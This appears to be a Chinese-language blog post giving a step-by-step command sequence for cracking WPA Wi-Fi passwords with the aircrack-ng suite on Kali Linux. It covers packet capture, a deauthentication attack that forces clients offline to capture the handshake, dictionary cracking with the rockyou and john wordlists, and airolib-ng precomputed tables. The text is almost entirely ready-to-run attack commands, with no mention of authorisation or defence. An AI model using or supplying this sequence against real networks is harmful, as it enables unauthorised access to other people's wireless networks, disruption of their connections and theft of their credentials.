无线网络的暴力破解密码

  • 抓取局域网内的数据包
airodump-ng wlan0mon
  • 过滤指定的数据包
airodump-ng wlan0mon -c * --bssid *
  • 将抓取的数据包保存至指定的目录中
airodump-ng wlan0mon -c *(指定通道) --bssid *(指定bssid) -w *(指定路径)
  • 实现客户端断网攻击,实现获取握手报文
aireplay-ng -0 2 -a *(AP地址) -c *(客户机地址) wlan0mon
  • 查看kali自带的小型字典
# 进入存放字典的目录
cd /usr/share/john/
# 查看字典的内容
cat password.lst
  • 使用字典进行攻击
aircrack-ng -w /usr/share/john/password.lst *.cap(包含握手报文的数据包文件)
  • 查看kali自带的大型字典
cd /usr/share/wordlists/
  • 解压kali自带的大型字典
gunzip rockyou.txt.gz
  • 使用字典进行攻击
aircrack-ng -w rockyou.txt(字典路径) *.cap(记录交换密匙的文件) 
  • 使用彩虹表进行提速攻击
# 将破解的ESSID写入到一个文本中
echo * > essid.txt
# 查看是否已经写入到文本中
cat essid.txt
# 将文本导入到数据库中
airolib-ng essid_db --import essid essid.txt
# 查看数据库中的状态
airolib-ng essid_db --stats
# 将字典导入至数据库中
airolib-ng essid_db --import passwd /usr/share/john/password.lst
# 查看数据库中的状态
airolib-ng essid_db --stats
# 生成彩虹表
airolib-ng essid_db --batch
# 实现暴力破解
airolib-ng -r essid_db *.cap(四次握手的报文)

 

你可能感兴趣的:(黑客攻击)